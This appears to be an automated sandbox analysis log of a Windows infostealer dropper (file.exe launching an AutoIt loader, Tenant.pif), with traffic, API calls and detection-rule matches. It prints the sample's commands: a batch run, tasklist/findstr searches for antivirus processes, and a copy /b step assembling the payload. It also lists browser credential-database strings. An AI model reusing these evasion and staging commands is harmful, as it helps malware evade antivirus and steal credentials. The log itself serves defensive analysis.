                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59949 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59947
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59949
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59948
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59943
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59944
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59952
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59954 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59948 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59952 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59957
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59959
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59954
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59953
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59956
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59955
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59959 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59960
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59938 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59955 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59941 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59943 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59947 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59953 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59937 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59956 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59940 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59938
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59937
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59960 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59940
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59957 -> 443
                    Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:59937 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.130.188.148:443 -> 192.168.2.5:59938 version: TLS 1.2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B14830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00B14830
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B14632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00B14632
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B2D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00B2D164

                    System Summary

                    Source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC0E38 FindCloseChangeNotification,NtProtectVirtualMemory,11_2_00AC0E38
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B042D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00B042D5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00AF8F2E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B05778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00B05778
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\OpenedResearcher
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SimonAmounts
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040497C0_2_0040497C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406ED20_2_00406ED2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004074BB0_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AAB02011_2_00AAB020
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AA94E011_2_00AA94E0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AA9C8011_2_00AA9C80
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC23F511_2_00AC23F5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B2840011_2_00B28400
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD650211_2_00AD6502
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AAE6F011_2_00AAE6F0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD265E11_2_00AD265E
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC282A11_2_00AC282A
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD89BF11_2_00AD89BF
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B20A3A11_2_00B20A3A
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD6A7411_2_00AD6A74
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AB0BE011_2_00AB0BE0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AFEDB211_2_00AFEDB2
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACCD5111_2_00ACCD51
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B20EB711_2_00B20EB7
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B08E4411_2_00B08E44
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD6FE611_2_00AD6FE6
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC33B711_2_00AC33B7
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACF40911_2_00ACF409
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ABD45D11_2_00ABD45D
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AAF6A011_2_00AAF6A0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC16B411_2_00AC16B4
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ABF62811_2_00ABF628
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AA166311_2_00AA1663
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC78C311_2_00AC78C3
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC1BA811_2_00AC1BA8
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACDBA511_2_00ACDBA5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD9CE511_2_00AD9CE5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ABDD2811_2_00ABDD28
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC1FC011_2_00AC1FC0
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACBFD611_2_00ACBFD6
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: String function: 00AC8B30 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: String function: 00AB1A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: String function: 00AC0D17 appears 70 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062A3 appears 58 times
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264
                    Source: file.exe, 00000000.00000002.2014158848.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/36@3/3
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0A6AD GetLastError,FormatMessageW,11_2_00B0A6AD
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF8DE9 AdjustTokenPrivileges,CloseHandle,11_2_00AF8DE9
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00AF9399
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B04148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00B04148
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00B0443D
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199761128941[1].htm
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2260
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDA49.tmp
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: CBKJJJ.11.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                    Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 271973
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "NorwegianLivedJerseyRelaxation" Para
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say C
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Tenant.pif C
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264
                    Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
